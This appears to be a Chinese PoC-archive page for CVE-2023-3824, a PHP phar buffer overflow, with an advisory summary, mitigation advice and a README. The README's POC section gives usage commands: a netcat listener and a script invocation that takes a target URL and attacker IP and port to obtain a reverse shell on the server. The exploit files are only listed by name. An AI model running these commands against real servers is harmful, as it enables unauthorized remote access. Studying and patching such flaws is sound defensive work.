POC详情: 0b128e35c13f0e30c0d4ed3eaa453197c22dc6ec

来源
关联漏洞
标题: PHP 缓冲区错误漏洞 (CVE-2023-3824)
描述:PHP是一种在服务器端执行的脚本语言。 PHP存在安全漏洞,该漏洞源于函数phar_dir_read()存在缓冲区溢出漏洞,该漏洞会导致内存损坏或远程代码执行(RCE)。受影响的产品和版本:PHP 8.0.30之前的8.0版本,8.1.22之前的8.1版本,8.2.8之前的8.2版本。
描述
In PHP version 8.0.* before 8.0.30,  8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. 
介绍
# About


CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.

## Exploitation Overview

- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.

## Exploit Example

The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.

A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.

## Mitigation

- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.

This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.

# POC

Run reverse shell listener:

```bash
nc -l local_port
```

Then run POC:

```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```

* _remote_url_ is vulnerable remote php script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is an attacker machine IP 
* _local_port_ is an attacker machine port

If the exploit succeeds, you'll get the shell with the server's (apache, nginx) permissions.

---

---

```text


                                                        .--,-``-.             
                                             ,---,     /   /     '.           
  ,---,                                    ,--.' |    / ../        ;          
,---.'|                                    |  |  :    \ ``\  .`-    '  __  ,-.
|   | :                           .--.--.  :  :  :     \___\/   \   :,' ,'/ /|
:   : :      ,--.--.     ,---.   /  /    ' :  |  |,--.      \   :   |'  | |' |
:     |,-.  /       \   /     \ |  :  /`./ |  :  '   |      /  /   / |  |   ,'
|   : '  | .--.  .-. | /    /  ||  :  ;_   |  |   /' :      \  \   \ '  :  /  
|   |  / :  \__\/: . ..    ' / | \  \    `.'  :  | | |  ___ /   :   ||  | '   
'   : |: |  ," .--.; |'   ;   /|  `----.   \  |  ' | : /   /\   /   :;  : |   
|   | '/ : /  /  ,.  |'   |  / | /  /`--'  /  :  :_:,'/ ,,/  ',-    .|  , ;   
|   :    |;  :   .'   \   :    |'--'.     /|  | ,'    \ ''\        ;  ---'    
/    \  / |  ,     .-./\   \  /   `--'---' `--''       \   \     .'           
`-'----'   `--`---'     `----'                          `--`-,,-'             
```

---
inspired by ::PerfectForms::
文件快照

[4.0K] /data/pocs/0b128e35c13f0e30c0d4ed3eaa453197c22dc6ec ├── [1.2K] cve-2023-3824.sh ├── [ 192] generate.php ├── [ 0] injectee.php ├── [ 39K] payload.bin └── [3.5K] README.md 0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。